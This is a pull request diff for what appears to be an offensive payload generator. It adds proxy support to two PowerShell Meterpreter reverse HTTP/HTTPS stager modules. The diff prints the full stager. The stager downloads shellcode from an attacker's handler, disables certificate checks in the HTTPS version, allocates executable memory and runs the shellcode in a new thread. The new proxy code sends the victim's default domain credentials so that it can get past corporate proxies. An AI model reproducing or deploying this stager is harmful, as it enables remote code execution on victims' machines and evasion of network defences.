### PR TITLE
Added proxy support for rev_http and rev_https Powershell modules

### DIFF
--- a/modules/payloads/powershell/meterpreter/rev_http.py
+++ b/modules/payloads/powershell/meterpreter/rev_http.py
@@ -20,11 +20,14 @@ class Payload:
         
         # optional
         self.required_options = {   "LHOST" : ["", "IP of the metasploit handler"],
-                                    "LPORT" : ["8080", "Port of the metasploit handler"]}
+                                    "LPORT" : ["8080", "Port of the metasploit handler"],
+                                    "PROXY" : ["N", "Use system proxy settings"]
+                                }
 
     
     def generate(self):
-        
+       
+        proxyString = "$pr = [System.Net.WebRequest]::GetSystemWebProxy();$pr.Credentials=[System.Net.CredentialCache]::DefaultCredentials;$m.proxy=$pr;$m.UseDefaultCredentials=$true;"
         baseString = """$q = @"
 [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
 [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
@@ -34,11 +37,12 @@ function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum %% 
 function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}
 function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
 function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}
-$m = New-Object System.Net.WebClient;$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)")
+$m = New-Object System.Net.WebClient;%s$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)")
 $n = g; [Byte[]] $p = $m.DownloadData("http://%s:%s/$n" )
 $o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru
 $x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)
-$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %(self.required_options["LHOST"][0], self.required_options["LPORT"][0])
+$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %("" if self.required_options["PROXY"][0] == "N" else proxyString,
+                                                                                 self.required_options["LHOST"][0], self.required_options["LPORT"][0])
 
         encoded = helpers.deflate(baseString)
 

--- a/modules/payloads/powershell/meterpreter/rev_https.py
+++ b/modules/payloads/powershell/meterpreter/rev_https.py
@@ -20,11 +20,14 @@ class Payload:
         
         # optional
         self.required_options = {   "LHOST" : ["", "IP of the metasploit handler"],
-                                    "LPORT" : ["8443", "Port of the metasploit handler"]}
+                                    "LPORT" : ["8443", "Port of the metasploit handler"],
+                                    "PROXY" : ["N", "Use system proxy settings"]
+                                }
 
     
     def generate(self):
         
+        proxyString = "$pr = [System.Net.WebRequest]::GetSystemWebProxy();$pr.Credentials=[System.Net.CredentialCache]::DefaultCredentials;$m.proxy=$pr;$m.UseDefaultCredentials=$true;"
         baseString = """$q = @"
 [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
 [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
@@ -34,11 +37,12 @@ function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum %% 
 function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}
 function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
 function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}
-[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient;
+[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient;%s
 $m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$n = g; [Byte[]] $p = $m.DownloadData("https://%s:%s/$n" )
 $o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru
 $x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)
-$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %(self.required_options["LHOST"][0], self.required_options["LPORT"][0])
+$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %("" if self.required_options["PROXY"][0] == "N" else proxyString,
+                                                                              self.required_options["LHOST"][0], self.required_options["LPORT"][0])
 
         encoded = helpers.deflate(baseString)
 


### PR DESCRIPTION
This PR adds proxy support for the Powershell HTTP/HTTPS modules during the initial fetch.  It will also pass local credentials in the event that upstream proxies require domain authentication.